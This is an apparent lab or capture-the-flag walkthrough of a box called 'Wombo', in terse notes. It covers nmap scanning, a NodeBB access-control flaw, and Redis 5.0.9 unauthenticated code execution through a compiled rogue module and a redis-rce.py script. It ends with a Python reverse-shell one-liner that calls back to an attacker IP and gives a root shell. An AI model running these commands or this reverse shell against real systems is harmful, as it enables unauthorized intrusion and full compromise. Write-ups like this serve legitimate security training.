Wombo

Wombo

‎$ whoami

Enum

sudo nmap -T4 -A -v -o nmap --min-rate 1000  192.168.193.210
sudo nmap -T4 -A -v -o tcpall -p- --min-rate 1000  192.168.193.210
sudo nmap -T4 --script=vuln -v -o vuln -p- --min-rate 1000   192.168.193.210

Found port 8080

NodeBB

Googled exploits

found broken access control

loaded in burp

image

to 1

image

Now can we login as admin?

Login page is broken, but robots leaks admin login

image
image
image

Local login system? does that mean its a local account? - Unable to SSH

hmmmmmm

back to nmap we see port

6379/tcp  open   redis      Redis key-value store 5.0.9

open as well.

searchsploit redis 5
---------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                            |  Path
---------------------------------------------------------------------------------------------------------- ---------------------------------
Dokany 1.2.0.1000 - Stack-Based Buffer Overflow Privilege Escalation                                      | windows/local/46155.c
Dokany 1.2.0.1000 - Stack-Based Buffer Overflow Privilege Escalation                                      | windows/local/46155.c
Microsoft Windows 10 - Diagnostics Hub Standard Collector Service Privilege Escalation                    | windows/local/45244.txt
Redis 4.x / 5.x - Unauthenticated Code Execution (Metasploit)                                             | linux/remote/47195.rb
Redis 5.0 - Denial of Service                                                                             | linux/dos/44908.txt
Redis-cli < 5.0 - Buffer Overflow (PoC)                                                                   | linux/local/44904.py
---------------------------------------------------------------------------------------------------------- ---------------------------------

We have metasploit modules, but lets google for non-msf PoCs

try this one

Embed GitHub

We gotta make a rogue module

Embed GitHub

git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand.git
cd RedisModules-ExecuteCommand

compile module

make
 mv module.so ../
python3 redis-rce.py -r 192.168.220.69 -p 6379 -L 192.168.45.207 -P 8080 -f module.so

that’s a shell

image

thats root?

[+] What do u want ? [i]nteractive shell or [r]everse shell or [e]xit: i
[+] Interactive shell open , use "exit" to exit...
$ whoami
eroot
$

we can’t cd into dirs, lets get a real shell.

export RHOST="192.168.45.207";export RPORT=22;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'
image

thats root.